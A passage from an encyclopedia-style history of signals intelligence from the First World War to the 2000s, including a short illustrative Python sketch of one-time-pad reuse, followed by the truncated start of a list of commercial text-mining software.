it was first solved, and a general procedure for interpreting the messages was determined. A second important code - the Handelsverkehrsbuch (HVB) codebook used by the German navy - was captured at the very start of the war from the German-Australian steamer Hobart, seized off Port Philip Heads near Melbourne on 11 August 1914. The code was used particularly by light forces such as patrol boats, and for routine matters such as leaving and entering harbour. The code was used by U-boats, but with a more complex key. A third codebook was recovered following the sinking of the German destroyer SMS S119 in a battle off Texel island. It contained a copy of the Verkehrsbuch (VB) codebook, intended for use in cables sent overseas to warships and naval attachés, embassies and consulates. Its greatest importance during the war was that it allowed access to communications between naval attachés in Berlin, Madrid, Washington, Buenos Aires, Peking, and Constantinople. The German fleet was in the habit each day of wirelessing the exact position of each ship and giving regular position reports when at sea. It was possible to build up a precise picture of the normal operation of the High Seas Fleet, indeed to infer from the routes they chose where defensive minefields had been placed and where it was safe for ships to operate. 
Whenever a change to the normal pattern was seen, it immediately signalled that some operation was about to take place and a warning could be given. Detailed information about submarine movements was also available. Direction finding The use of radio receiving equipment to pinpoint the location of the transmitter was also developed during the war. Captain H.J. Round, working for Marconi, began carrying out experiments with direction finding radio equipment for the army in France in 1915. Hall instructed him to build a direction finding system for the navy. This was sited at Lowestoft and other stations were built at Lerwick, Aberdeen, York, Flamborough Head and Birchington, and by May 1915 the Admiralty was able to track German submarines crossing the North Sea. Some of these stations also acted as 'Y' stations to collect German messages, but a new section was created within Room 40 to plot the positions of ships from the directional reports. Room 40 had very accurate information on the positions of German ships, but the Admiralty priority remained to keep the existence of this knowledge secret. From June 1915 the regular intelligence reports of ship positions were no longer passed to all flag officers, but only to Admiral Jellicoe himself. Similarly, he was the only person to receive accurate charts of German minefields prepared from Room 40 information. No attempts were made by the German fleet to restrict its use of wireless until 1917, and then only in response to perceived British use of direction finding, not because it believed messages were being decoded. It became increasingly clear that, as important as the decrypts were, it was of equal importance to accurately analyse the information provided. An illustration of this was provided by someone at the Admiralty who knew a little too much detail about SIGINT without fully understanding it. He asked the analysts where call sign "DK" was located, which was that used by the German commander when in harbour. The analysts answered his question precisely, telling him that it was "in the Jade River". Unfortunately the High Seas Fleet commander used a different identifier when at sea, going so far as to transfer the same wireless operator ashore so the messages from the harbour would sound the same. The misinformation was passed to Jellicoe commanding the British fleet, who acted accordingly and proceeded at a slower speed to preserve fuel. The Battle of Jutland was eventually fought, but its lateness in the day allowed the enemy to escape. Jellicoe's faith in cryptographic intelligence was also shaken by a decrypted report that placed the German cruiser SMS Regensburg near him during the Battle of Jutland. It turned out that the navigator on the Regensburg was off in his position calculation. During Jutland, there was limited use of direction finding on fleet vessels, but most information came from shore stations. A whole string of messages was intercepted during the night indicating with high reliability how the German fleet intended to make good its escape, but the brief summary which was passed to Jellicoe failed to convince him of its accuracy in light of the other failures during the day. Zimmermann Telegram & Other Successes Room 40 played an important role in several naval engagements during the war, notably in detecting major German sorties into the North Sea. The Battle of Dogger Bank was won in no small part due to the intercepts that allowed the Navy to position its ships in the right place. 
"Warned of a new German raid [on England] on the night of 23–24 January, by radio intercepts, [Admiral Sir David] Beatty’s force made a rendezvous off the Dogger Bank... The outnumbered Germans turned in flight. ... the Kaiser, fearful of losing capital ships, ordered his navy to avoid all further risks." It played a vital role in subsequent naval clashes, including at the Battle of Jutland as the British fleet was sent out to intercept them. The direction-finding capability allowed for the tracking and location of German ships, submarines and Zeppelins. Intercepts were also able to prove beyond doubt that the German high command had authorized the sinking of the Lusitania in May 1915, despite the vociferous German denials at the time. The system was so successful, that by the end of the war over 80 million words, comprising the totality of German wireless transmission over the course of the war had been intercepted by the operators of the Y-stations and decrypted. However its most astonishing success was in decrypting the Zimmermann Telegram, a telegram from the German Foreign Office sent via Washington to its ambassador Heinrich von Eckardt in Mexico. In the telegram's plaintext, Nigel de Grey and William Montgomery learned of the German Foreign Minister Arthur Zimmermann's offer to Mexico of United States' territories of Arizona, New Mexico, and Texas as an enticement to join the war as a German ally. The telegram was passed to the U.S. by Captain Hall, and a scheme was devised (involving a still unknown agent in Mexico and a burglary) to conceal how its plaintext had become available and also how the U.S. had gained possession of a copy. The telegram was made public by the United States, which declared war on Germany on 6 April 1917, entering the war on the Allied side. Interwar period With the importance of interception and decryption firmly established by the wartime experience, countries established permanent agencies dedicated to this task in the interwar period. These agencies carried out substantial SIGINT work between the World Wars, although the secrecy surrounding it was extreme. While the work carried out was primarily COMINT, ELINT also emerged, with the development of radar in the 1930s. United Kingdom In 1919, the British Cabinet's Secret Service Committee, chaired by Lord Curzon, recommended that a peace-time codebreaking agency should be created, a task given to the then-Director of Naval Intelligence, Hugh Sinclair. Sinclair merged staff from the British Army's MI1b and Royal Navy's Room 40 into the first peace-time codebreaking agency: the Government Code and Cypher School (GC&CS). The organization initially consisted of around 25–30 officers and a similar number of clerical staff. It was titled the "Government Code and Cypher School", a cover-name chosen by Victor Forbes of the Foreign Office. Alastair Denniston, who had been a leading member of Room 40, was appointed as its operational head. It was initially under the control of the Admiralty, and located in Watergate House, Adelphi, London. Its public function was "to advise as to the security of codes and cyphers used by all Government departments and to assist in their provision", but also had a secret directive to "study the methods of cypher communications used by foreign powers". GC&CS officially formed on 1 November 1919, and produced its first decrypt on 19 October. 
By 1922, the main focus of GC&CS was on diplomatic traffic, with "no service traffic ever worth circulating" and so, at the initiative of Lord Curzon, it was transferred from the Admiralty to the Foreign Office. GC&CS came under the supervision of Hugh Sinclair, who by 1923 was both the Chief of SIS and Director of GC&CS. In 1925, both organisations were co-located on different floors of Broadway Buildings, opposite St. James's Park. Messages decrypted by GC&CS were distributed in blue-jacketed files that became known as "BJs". In the 1920s, GC&CS was successfully reading Soviet Union diplomatic ciphers. However, in May 1927, during a row over clandestine Soviet support for the General Strike and the distribution of subversive propaganda, Prime Minister Stanley Baldwin made details from the decrypts public. By 1940, GC&CS was working on the diplomatic codes and ciphers of 26 countries, tackling over 150 diplomatic cryptosystems. Germany From the mid-twenties, German Military Intelligence Abwehr began intercepting and cryptanalyzing diplomatic traffic. Under Hermann Göring, the Nazi Research Bureau (Forschungsamt or "FA") had units for intercepting domestic and international communications. The FA was penetrated by a French spy in the 1930s, but the traffic grew to a point that it could not easily be forwarded. In addition to intercept stations in Germany, the FA established an intercept station in Berne, Switzerland. German code breaking penetrated most cryptosystems, other than the UK and US. German Condor Legion personnel in the Spanish Civil War ran COMINT against their opponents. United States The US Cipher Bureau was established in 1919 and achieved some success at the Washington Naval Conference in 1921, through cryptanalysis by Herbert Yardley. Secretary of War Henry L. Stimson closed the US Cipher Bureau in 1929 with the words "Gentlemen do not read each other's mail." Luckily for US COMINT, the Army offered a home to William Friedman after Stimson closed the Yardley operation. There, largely manual cylindrical and strip ciphers were developed, but, as a result of Friedman's advances in cryptanalysis, machine ciphers became a priority, such as the M134, also known as the SIGABA. While the SIGABA was a rotor machine like the German Enigma machine, it was never known to be cracked. It was replaced by electronic encryption devices. The American Sigint effort began in the early 1930s with mounting tensions with the Japanese. The Navy started implementing high frequency DF (HF/DF) at eleven planned locations, primarily on the Atlantic Coast. The first operational intercept came from what would later be called Station CAST, at Cavite in the Philippines. In July 1939, the function turned from training and R&D to operations, and the Navy officially established a Strategic Tracking Organization under a Direction Finder Policy. By December 1940, the Navy's communication organization, OP-20-G, had used HF/DF on German surface vessels and submarines. Training continued and cooperation with the British began. In April 1941, the British gave the US Navy a sample of their best HF/DF set from Marconi. World War II The use of SIGINT had even greater implications during World War II. The combined effort of intercepts and cryptanalysis for the whole of the British forces in World War II came under the code name "Ultra" managed from Government Code and Cypher School at Bletchley Park. 
By 1943, such was the extent of penetration of Axis communications and the speed and efficiency of distribution of the resulting intelligence that messages sometimes reached Allied commanders in the field before their intended recipients. This advantage failed only when the German ground forces retreated within their own borders and they began using secure landline communications. For this reason, the Battle of the Bulge took the Allies completely by surprise. Although it was a true world war, SIGINT still tended to be organized separately in the various theaters. Communications security, on the part of the Allies, was more centralized. From the Allied perspective, the critical theater-level efforts were Ultra SIGINT against the Germans in the European theater (including the Battle of the Atlantic and the Mediterranean Theater of Operations), and MAGIC against the Japanese in the Pacific Theater and the China-Burma-India theater. The entire German system of high command suffered from Hitler's deliberate fragmenting of authority, with Party, State, and military organizations competing for power. Hermann Göring also sought power for its own sake, but was much less effective as the war went on and he became more focused on personal status and pleasure. Germany enjoyed some SIGINT success against the Allies, especially with the Merchant Code and, early in the war, reading American attaché traffic. German air intelligence, during the Battle of Britain, suffered from the structural problem that subordinated intelligence to operations. Operations officers often drew conclusions that best fit their plans, rather than fitting conclusions to information. In contrast, British air intelligence was systematic, from the highest-level, most sensitive Ultra to significant intelligence product from traffic analysis and cryptanalysis of low-level systems. Fortunately for the British, German aircraft communications discipline was poor, and the Germans rarely changed call signs, allowing the British to draw accurate inferences about the air order of battle. Japan was the least effective of the major powers in SIGINT. In addition to the official Allies and Axis battle of signals, there was a growing interest in Soviet espionage communications, which continued after the war. British SIGINT The British Government Code and Cypher School moved to Bletchley Park, in Milton Keynes, Buckinghamshire, at the beginning of the Second World War. A key advantage was Bletchley's geographical centrality. Commander Alastair Denniston was operational head of GC&CS. Key GC&CS cryptanalysts who moved from London to Bletchley Park included John Tiltman, Dillwyn "Dilly" Knox, Josh Cooper, and Nigel de Grey. These people had a variety of backgrounds: linguists, chess champions, and crossword experts were common, and, in Knox's case, papyrology. In one 1941 recruiting stratagem, The Daily Telegraph was asked to organise a crossword competition, after which promising contestants were discreetly approached about "a particular type of work as a contribution to the war effort". Denniston recognised, however, that the enemy's use of electromechanical cipher machines meant that formally trained mathematicians would be needed as well; Oxford's Peter Twinn joined GC&CS in February 1939; Cambridge's Alan Turing and Gordon Welchman began training in 1938 and reported to Bletchley the day after war was declared, along with John Jeffreys. 
Later-recruited cryptanalysts included the mathematicians Derek Taunt, Jack Good, Bill Tutte, and Max Newman; the historian Harry Hinsley; and the chess champions Hugh Alexander and Stuart Milner-Barry. Joan Clarke (eventually deputy head of Hut 8) was one of the few women employed at Bletchley as a full-fledged cryptanalyst. Properly used, the German Enigma and Lorenz ciphers should have been virtually unbreakable, but flaws in German cryptographic procedures, and poor discipline among the personnel carrying them out, created vulnerabilities which made Bletchley's attacks just barely feasible. These vulnerabilities, however, could have been remedied by relatively simple improvements in enemy procedures, and such changes would certainly have been implemented had Germany had any hint of Bletchley's success. Thus the intelligence Bletchley produced was considered wartime Britain's "Ultra secret", higher even than the normally highest classification Most Secret, and security was paramount. Initially, a wireless room was established at Bletchley Park. It was set up in the mansion's water tower under the code name "Station X", a term now sometimes applied to the codebreaking efforts at Bletchley as a whole. Due to the long radio aerials stretching from the wireless room, the radio station was moved from Bletchley Park to nearby Whaddon Hall to avoid drawing attention to the site. Subsequently, other listening stations, the Y-stations, such as the ones at Chicksands in Bedfordshire, Beaumanor Hall, Leicestershire (where the headquarters of the War Office "Y" Group was located) and Beeston Hill Y Station in Norfolk, gathered raw signals for processing at Bletchley. Coded messages were taken down by hand and sent to Bletchley on paper by motorcycle despatch riders or (later) by teleprinter. Bletchley's work was essential to defeating the U-boats in the Battle of the Atlantic, and to the British naval victories in the Battle of Cape Matapan and the Battle of North Cape. In 1941, Ultra exerted a powerful effect on the North African desert campaign against German forces under General Erwin Rommel. General Sir Claude Auchinleck wrote that were it not for Ultra, "Rommel would have certainly got through to Cairo". "Ultra" decrypts featured prominently in the story of Operation SALAM, László Almásy's daring mission across the Libyan Desert behind enemy lines in 1942. Prior to the Normandy landings on D-Day in June 1944, the Allies knew the locations of all but two of Germany's fifty-eight Western-front divisions. Winston Churchill was reported to have told King George VI: "It is thanks to the secret weapon of General Menzies, put into use on all the fronts, that we won the war!" At the end of the war, Supreme Allied Commander Dwight D. Eisenhower described Ultra as having been "decisive" to Allied victory. The official historian of British Intelligence in World War II, Sir Harry Hinsley, argued that Ultra shortened the war "by not less than two years and probably by four years"; and that, in the absence of Ultra, it is uncertain how the war would have ended. German codes Most German messages decrypted at Bletchley were produced by one or another version of the Enigma cipher machine, but an important minority were produced by the even more complicated twelve-rotor Lorenz SZ42 on-line teleprinter cipher machine. Five weeks before the outbreak of war, in Warsaw, Poland's Cipher Bureau revealed its achievements in breaking Enigma to astonished French and British personnel. 
The British used the Poles' information and techniques, and the Enigma clone sent to them in August 1939, which greatly increased their (previously very limited) success in decrypting Enigma messages. The bombe was an electromechanical device whose function was to discover some of the daily settings of the Enigma machines on the various German military networks. Its pioneering design was developed by Alan Turing (with an important contribution from Gordon Welchman) and the machine was engineered by Harold 'Doc' Keen of the British Tabulating Machine Company. Each machine was about high and wide, deep and weighed about a ton. At its peak, GC&CS was reading approximately 4,000 messages per day. As a hedge against enemy attack most bombes were dispersed to installations at Adstock and Wavendon (both later supplanted by installations at Stanmore and Eastcote), and Gayhurst. Luftwaffe messages were the first to be read in quantity. The German navy had much tighter procedures, and the capture of code books was needed before they could be broken. When, in February 1942, the German navy introduced the four-rotor Enigma for communications with its Atlantic U-boats, this traffic became unreadable for a period of ten months. Britain produced modified bombes, but it was the success of the US Navy bombe that was the main source of reading messages from this version of Enigma for the rest of the war. Messages were sent to and fro across the Atlantic by enciphered teleprinter links. SIGINT played a most important role for the Royal Navy, in its protection of merchant ships during the Battle of the Atlantic. While Ultra cryptanalysis certainly played a role in dealing with German submarines, HF/DF and traffic analysis were complementary. It is unclear why the German submarine command believed that frequent radio communications were not a hazard to their boats, although they seemed confident in the security of their Enigma ciphers, both in the initial three-rotor and subsequent four-rotor versions (known as Triton to the Germans and Shark to the Allies). There was an apparent, mutually reinforcing belief that wolfpack attacks by groups of submarines were much more deadly than individual operations, and confidence the communications were secure. Arguably, the Germans underestimated HF/DF even more than they did British cryptanalysis. Apparently, the Germans did not realize that the Allies were not limited to slow, manually operated direction finders, and also underestimated the number of direction finders at sea. On the other hand, the introduction of a new secure communication system would have interrupted submarine operations for a long time since a gradual shift to a new system was out of the question. The Lorenz messages were codenamed Tunny at Bletchley Park. They were only sent in quantity from mid-1942. The Tunny networks were used for high-level messages between German High Command and field commanders. With the help of German operator errors, the cryptanalysts in the Testery (named after Ralph Tester, its head) worked out the logical structure of the machine despite not knowing its physical form. They devised automatic machinery to help with decryption, which culminated in Colossus, the world's first programmable digital electronic computer. This was designed and built by Tommy Flowers and his team at the Post Office Research Station at Dollis Hill. The first was delivered to Bletchley Park in December 1943 and commissioned the following February. 
Enhancements were developed for the Mark 2 Colossus, the first of which was working at Bletchley Park on the morning of D-Day in June. Flowers then produced one Colossus a month for the rest of the war, making a total of ten with an eleventh part-built. The machines were operated mainly by Wrens in a section named the Newmanry after its head Max Newman. The "Radio Security Service" was established by MI8 in 1939 to control a network of direction finding and intercept stations to locate illicit transmissions coming from German spies in Britain. This service was soon intercepting a network of German Secret Service transmissions across Europe. Successful decryption was achieved at an early stage with the help of codes obtained from the British XX (Double Cross) System that "turned" German agents and used them to misdirect German intelligence. The combination of double agents and extensive penetration of German intelligence transmissions facilitated a series of highly successful strategic deception programmes throughout WWII. Italian codes Breakthroughs were also made with Italian signals. During the Spanish Civil War the Italian Navy used the K model of the commercial Enigma without a plugboard; this was solved by Knox in 1937. When Italy entered the war in 1940 an improved version of the machine was used, though little traffic was sent by it and there were "wholesale changes" in Italian codes and cyphers. Knox was given a new section for work on Enigma variations, which he staffed with women ("Dilly's girls") who included Margaret Rock, Jean Perrin, Clare Harding, Rachel Ronald, Elisabeth Granger, and Mavis Lever, who made the first break into the Italian naval traffic. She solved the signals revealing the Italian Navy's operational plans before the Battle of Cape Matapan in 1941, leading to a British victory. On entering World War II in June 1940, the Italians were using book codes for most of their military messages. The exception was the Italian Navy, which after the Battle of Cape Matapan started using the C-38 version of the Boris Hagelin rotor-based cipher machine, particularly to route their navy and merchant marine convoys to the conflict in North Africa. As a consequence, JRM Butler recruited his former student Bernard Willson to join a team with two others in Hut 4. In June 1941, Willson became the first of the team to decode the Hagelin system, thus enabling military commanders to direct the Royal Navy and Royal Air Force to sink enemy ships carrying supplies from Europe to Rommel's Afrika Korps. This led to increased shipping losses and, from reading the intercepted traffic, the team learnt that between May and September 1941 the stock of fuel for the Luftwaffe in North Africa was reduced by 90%. After an intensive language course, in March 1944 Willson switched to Japanese language-based codes. Japanese codes An outpost of the Government Code and Cypher School was set up in Hong Kong in 1935, the Far East Combined Bureau (FECB), to study Japanese signals. The FECB naval staff moved in 1940 to Singapore, then Colombo, Ceylon, then Kilindini, Mombasa, Kenya. They succeeded in deciphering Japanese codes with a mixture of skill and good fortune. The Army and Air Force staff went from Singapore to the Wireless Experimental Centre at Delhi, India. In early 1942, a six-month crash course in Japanese, for 20 undergraduates from Oxford and Cambridge, was started by the Inter-Services Special Intelligence School in Bedford, in a building across from the main Post Office. 
This course was repeated every six months until war's end. Most of those completing these courses worked on decoding Japanese naval messages in Hut 7, under John Tiltman. By mid-1945 well over 100 personnel were involved with this operation, which co-operated closely with the FECB and the US Signal Intelligence Service at Arlington Hall, Virginia. Because of these joint efforts, by August of that year the Japanese merchant navy was suffering 90% losses at sea. In 1999, Michael Smith wrote that "Only now are the British codebreakers (like John Tiltman, Hugh Foss, and Eric Nave) beginning to receive the recognition they deserve for breaking Japanese codes and cyphers". US SIGINT During the Second World War, the US Army and US Navy ran independent SIGINT organizations, with limited coordination, first on a purely personal basis, and then through committees. After the Normandy landings, Army SIGINT units accompanied major units, with traffic analysis as important as - or more important than - the tightly compartmented cryptanalytic information. General Bradley's Army Group, created on August 1, 1944, had SIGINT including access to Ultra. Patton's subordinate Third Army had a double-sized Signal Radio Intelligence Company attached to its headquarters, and two regular companies were assigned to the XV and VIII Corps. The US Navy used SIGINT in its anti-submarine warfare, using shore- or ship-based SIGINT to vector long-range patrol aircraft to U-boats. Allied cooperation in the Pacific Theater included the joint RAN/USN Fleet Radio Unit, Melbourne (FRUMEL), and the Central Bureau, which was attached to the HQ of the Allied Commander of the South-West Pacific area. At first, Central Bureau was made up of 50% American, 25% Australian Army and 25% Royal Australian Air Force (RAAF) personnel, but additional Australian staff joined. In addition, RAAF operators, trained in Townsville, Queensland, in intercepting Japanese telegraphic katakana, were integrated into the new Central Bureau. Until Central Bureau received replacement data processing equipment for that which was lost in the Philippines, as of January 1942, U.S. Navy stations in Hawaii (Hypo), Corregidor (Cast) and OP-20-G (Washington) decrypted Japanese traffic well before the U.S. Army or Central Bureau in Australia. Cast, of course, closed with the evacuation of SIGINT personnel from the Philippines. Central Bureau broke into two significant Japanese Army cryptosystems in mid-1943. Japanese codes The US Army shared with the US Navy the Purple attack on Japanese diplomatic cryptosystems. After the creation of the Army Signal Security Agency, the cryptographic school at Vint Hill Farms Station, Warrenton, Virginia, trained analysts. As a real-world training exercise, the new analysts first solved the message center identifier system for the Japanese Army. Until Japanese Army cryptosystems were broken later in 1943, the order of battle and movement information on the Japanese came purely from direction finding and traffic analysis. Traffic analysts began tracking Japanese units in near real time. A critical result was the identification of the movement, by sea, of two Japanese infantry divisions from Shanghai to New Guinea. Their convoy was intercepted by US submarines, causing almost complete destruction of these units. Army units in the Pacific included the US 978th Signal Company based at the Allied Intelligence Bureau's secret "Camp X", near Beaudesert, Queensland, south of Brisbane. 
This unit was a key part of operations behind Japanese lines, including communicating with guerillas and the Coastwatcher organization. It also sent radio operators to the guerillas, and then moved with the forces invading the Philippines. US Navy strategic stations targeted against Japanese sources at the outbreak of the war included Station HYPO in Hawaii, Station CAST in the Philippines, Station BAKER on Guam, and other locations including Puget Sound and Bainbridge Island. US COMINT recognized the growing threat before the Pearl Harbor attack, but a series of errors, as well as priorities that were incorrect in hindsight, prevented any operational preparation against the attack. Nevertheless, that attack gave much higher priority to COMINT, both in Washington, D.C. and at the Pacific Fleet Headquarters in Honolulu. Organizational tuning corrected many prewar competitions between the Army and Navy. Perhaps most dramatically, intercepts of Japanese naval communications yielded information that gave Admiral Nimitz the upper hand in the ambush that resulted in the Japanese Navy's defeat at the Battle of Midway, six months after the Pearl Harbor attack. The US Army Air Force also had its own SIGINT capability. Soon after the Pearl Harbor attack, Lieutenant Howard Brown, of the 2nd Signal Service Company in Manila, ordered the unit to change its intercept targeting from Japanese diplomatic to air force communications. The unit soon was analyzing Japanese tactical networks and developing order of battle intelligence. They learned the Japanese air-to-ground network was centered at Sama, Hainan Island, with one station in Indochina, one station near Hong Kong, and the other 12 unlocated. Two Japanese naval stations were in the Army net, and it handled both operations and ferrying of aircraft for staging new operations. Traffic analysis of still-encrypted traffic helped MacArthur predict Japanese moves as the Fil-American forces retreated in Bataan. An Australian-American intercept station was later built at Townsville, Queensland. The 126th was placed under the operational control of U.S. Air Force Far East and its subordinate 5th Air Force in June 1943. Interception and traffic analysis from the company supported the attack into Dutch New Guinea in 1944. Cold War After the end of World War II, the Western Allies began a rapid drawdown. At the end of WWII, the US still had a COMINT organization split between the Army and Navy. A 1946 plan listed Russia, China, and a [redacted] country as high-priority targets. From 1943 to 1980, the Venona project, principally a US activity with support from Australia and the UK, recovered information, some tantalizingly only in part, from Soviet espionage traffic. While the Soviets had originally used theoretically unbreakable one-time pads for the traffic, some of their operations violated communications security rules and reused some of the pads. This reuse caused the vulnerability that was exploited. Venona gave substantial information on the scope of Soviet espionage against the West, but critics claim some messages have been interpreted incorrectly, or are even false. Part of the problem is that certain persons, even in the encrypted traffic, were identified only by code names such as "Quantum". Quantum was a source on US nuclear weapons, and is often considered to be Julius Rosenberg. The name, however, could refer to any of a number of spies. 
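The weakness that pad reuse creates can be illustrated with a short sketch. This is a deliberately simplified XOR model of a one-time pad, not the additive code-group system actually used in the Soviet traffic, and the pad and messages below are invented for illustration only.

```python
import os

def xor_bytes(a, b):
    """XOR two equal-length byte strings."""
    return bytes(x ^ y for x, y in zip(a, b))

pad = os.urandom(32)                       # one-time pad: secure only if used once
m1  = b"MEETING AT THE SAFE HOUSE TODAY "  # hypothetical plaintexts
m2  = b"QUANTUM DELIVERED THE DOCUMENTS "

c1 = xor_bytes(m1, pad)
c2 = xor_bytes(m2, pad)                    # reusing the pad is the fatal mistake

# The pad cancels out: c1 XOR c2 equals m1 XOR m2, so the relationship between
# the two plaintexts is exposed and cribbing and statistical attacks become
# possible, which is the kind of opening the Venona analysts exploited.
assert xor_bytes(c1, c2) == xor_bytes(m1, m2)
```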
US Tactical SIGINT After the Beirut deployment, Lieutenant General Alfred M. Gray, Jr. did an after-action review of the 2nd Radio Battalion detachment that went with that force. Part of the reason for this was that the irregular units that presented the greatest threat did not follow conventional military signal operating procedures, and used nonstandard frequencies and callsigns. Without NSA information on these groups, the detachment had to acquire this information from its own resources. Recognizing that national sources simply might not have information on a given environment, or that they might not make it available to warfighters, Lieutenant General Gray directed that a SIGINT function be created that could work with the elite Force Reconnaissance Marines who search out potential enemies. At first, neither the Force Reconnaissance nor Radio Battalion commanders thought this was viable, but had orders to follow. Initially, they attached a single Radio Battalion Marine, with an AN/GRR-8 intercept receiver, to a Force Reconnaissance team during an exercise. A respected Radio Marine, Corporal Kyle O'Malley, was sent to the team, without any guidance for what he was to do. The exercise did not demonstrate that a one-man attachment, not Force Recon qualified, was useful. In 1984, Captain E.L. Gillespie, assigned to the Joint Special Operations Command, was alerted that he was to report to 2nd Radio Battalion, to develop a concept of operations for integrating SIGINT capabilities with Force Recon, using his joint service experience with special operations. Again, the immediate commanders were not enthusiastic. Nevertheless, a mission statement was drafted: "To conduct limited communications intelligence and specified electronic warfare operations in support of Force Reconnaissance operations during advance force or special operations missions." It was decided that a 6-man SIGINT team, with long/short range independent communications and SIGINT/EW equipment, was the minimum practical unit. It was not practical to attach this to the smallest 4-man Force Recon team. General Gray directed that the unit would be called a Radio Reconnaissance Team (RRT), and that adequate planning and preparation be done for the advance force operations part of the upcoming Exercise Solid Shield-85. Two six-man teams would be formed, from Marines assigned from the Radio Battalion, without great enthusiasm for the assignment. One Marine put it: "There is nothing that the Marine Corps can do to me that I can't take." Force Recon required that the RRT candidates pass their selection course, and, to the surprise of Force Recon, they passed with honors. Both teams were assigned to the exercise, and the RRTs successfully maintained communications connectivity for Force Recon and SEALs, collected meaningful intelligence, disrupted opposing force communications, and were extracted without being compromised. From 1986 on, RRTs accompanied MEU (SOC) deployments. Their first combat role was in Operation Earnest Will, then Operation Praying Mantis, followed by participation in the 1989 United States invasion of Panama. Recent history As evidenced by the Hainan Island incident, even while China and the US may cooperate on matters of mutual concern towards Russia, the Cold War has not completely disappeared. There was more regional cooperation, often driven by concerns about transnational terrorism. 
European countries also are finding that, by sharing the cost, they can acquire SIGINT, IMINT, and MASINT capabilities independent of the US. In the US, both communications security and COMINT policies have been evolving, some with challenges. The adoption of a Belgian-developed encryption algorithm, approved in a public process and accepted both for sensitive but unclassified traffic and for classified information sent with NSA-generated and maintained keys, redraws the cryptologic environment as no longer NSA or not-NSA. Controversy continues on various types of COMINT justified as not requiring warrants, under the wartime authority of the President of the United States. Technologically, there was much greater use of UAVs as SIGINT collection platforms. Threat from terrorism Terrorism from foreign groups became an increasingly major concern, as with the 1992 al-Qaeda attack in Yemen, the 1993 truck bombing of the World Trade Center, the 1996 Khobar Towers bombing in Saudi Arabia and the 1998 bombings of the US embassies in Dar es Salaam, Tanzania and Nairobi, Kenya. Third world and non-national groups, with modern communications technology, in many ways are a harder SIGINT target than a nation that sends out large amounts of traffic. According to the retired Commandant of the US Marines, Alfred M. Gray, Jr., some of the significant concerns of these targets are: Inherently low probability of intercept/detection (LPI/LPD), because off-the-shelf radios can be frequency agile, spread spectrum, and transmit in bursts. Additional frequencies, not normally monitored, can be used; these include citizens band, marine (MF, HF, VHF) bands, personal radio services such as MURS, FRS/GMRS, and higher frequencies for short-range communications. Extensive use of telephones, almost always digital. Cellular and satellite telephones, while wireless, are challenging to intercept, as is Voice over IP (VoIP). Commercial strong encryption for voice and data. "Extremely wide variety and complexity of potential targets, creating a "needle in the haystack" problem". As a result of the 9/11 attacks, intensification of US intelligence efforts, domestic and foreign, was to be expected. A key question, of course, was whether US intelligence could have prevented or mitigated the attacks, and how it might prevent future attacks. There is a continuing clash between advocates for civil liberties and those who assert that their loss is an acceptable exchange for enhanced safety. Under the George W. Bush administration, there was a large-scale and controversial capture and analysis of domestic and international telephone calls, claimed to be targeted against terrorism. It is generally accepted that warrants have not been obtained for this activity, sometimes called Room 641A after a location in San Francisco where AT&T provides NSA access. While very little is known about this system, it may be focused more on the signaling channel and call detail records than on the actual content of conversations. Another possibility is the use of software tools that do high-performance deep packet inspection. According to the marketing VP of Narus, "Narus has little control over how its products are used after they're sold. For example, although its lawful-intercept application has a sophisticated system for making sure the surveillance complies with the terms of a warrant, it's up to the operator whether to type those terms into the system... 
"That legal eavesdropping application was launched in February 2005, well after whistle-blower Klein allegedly learned that AT&T was installing Narus boxes in secure, NSA-controlled rooms in switching centers around the country. But that doesn't mean the government couldn't write its own code to do the dirty work. Narus even offers software-development kits to customers ". The same type of tools with legitimate ISP security applications also have COMINT interception and analysis capability. Former AT&T technician Mark Klein, who revealed AT&T was giving NSA access, said in a statement, said a Narus STA 6400 was in the NSA room to which AT&T allegedly copied traffic. The Narus device was "known to be used particularly by government intelligence agencies because of its ability to sift through large amounts of data looking for preprogrammed targets." European Space Systems cooperation French initiatives, along with French and Russian satellite launching, have led to cooperative continental European arrangements for intelligence sensors in space. In contrast, the UK has reinforced cooperation under the UKUSA agreement. France launched Helios 1A as a military photo-reconnaissance satellite on 7 July 1995. The Cerise (satellite) SIGINT technology demonstrator also was launched in 1995. A radio propagation experiment, S80-T, was launched in 1992, as a predecessor of the ELINT experiments. Clementine, the second-generation ELINT technology demonstrator, was launched in 1999. Financial pressures in 1994-1995 caused France to seek Spanish and Italian cooperation for Hélios 1B and German contributions to Helios 2. Helios 2A was launched on 18 December 2004. Built by EADS-Astrium for the French Space Agency (CNES), it was launched into a Sun-synchronous polar orbit at an altitude of about 680 kilometers. The same launcher carried French and Spanish scientific satellites and four Essaim ("Swarm") experimental ELINT satellites Germany launched their first reconnaissance satellite system, SAR-Lupe, on December 19, 2006. Further satellites were launched at roughly six-month intervals, and the entire system of this five-satellite synthetic aperture radar constellation achieved full operational readiness on 22 July 2008. SAR is usually considered a MASINT sensor, but the significance here is that Germany obtains access to French satellite ELINT. The joint French-Italian Orfeo Programme, a dual-use civilian and military satellite system, launched its first satellite on June 8, 2007. Italy is developing the Cosmo-Skymed X-band polarimetric SAR, to fly on two of the satellites. The other two will have complementary French electro-optical payloads. The second Orfeo is scheduled to launch in early 2008. While this is not an explicit SIGINT system, the French-Italian cooperation may suggest that Italy can get data from the French Essaim ELINT microsatellites. See also Signals intelligence by alliances, nations and industries References Bibliography Signals intelligence Military history by topic
41996200
https://en.wikipedia.org/wiki/List%20of%20text%20mining%20software
List of text mining software
Text mining computer programs are available from many commercial and open source companies and sources. Commercial Angoss – Angoss Text Analytics provides entity and theme extraction, topic categorization, sentiment analysis and document summarization capabilities via an embedded text analytics engine. AUTINDEX – a commercial text mining software package based on sophisticated linguistics by IAI (Institute for Applied Information Sciences), Saarbrücken. DigitalMR – social media listening & text+image analytics tool for market research. FICO Score – leading provider of analytics. General Sentiment – Social Intelligence platform that uses natural language processing to discover affinities between the fans of brands and the fans of traditional television shows in social media. Stand-alone text analytics captures a social knowledge base on billions of topics dating back to 2004. IBM LanguageWare – the IBM suite for text analytics (tools and Runtime). IBM SPSS – provider of Modeler Premium (previously called IBM SPSS Modeler and IBM SPSS Text Analytics), which contains advanced NLP-based text analysis capabilities (multi-lingual sentiment, event and fact extraction) that can be used in conjunction with predictive modeling. Text Analytics for Surveys provides the ability to categorize survey responses using NLP-based capabilities for further analysis or reporting. Inxight – provider of text analytics, search, and unstructured visualization technologies (Inxight was bought by Business Objects, which was in turn bought by SAP AG in 2008). Language Computer Corporation – text extraction and analysis tools, available in multiple languages. Lexalytics – provider of a text analytics engine, the Salience Engine, used in Social Media Monitoring, Voice of Customer, Survey Analysis, and other applications. The software provides the capability of merging the output of unstructured, text-based 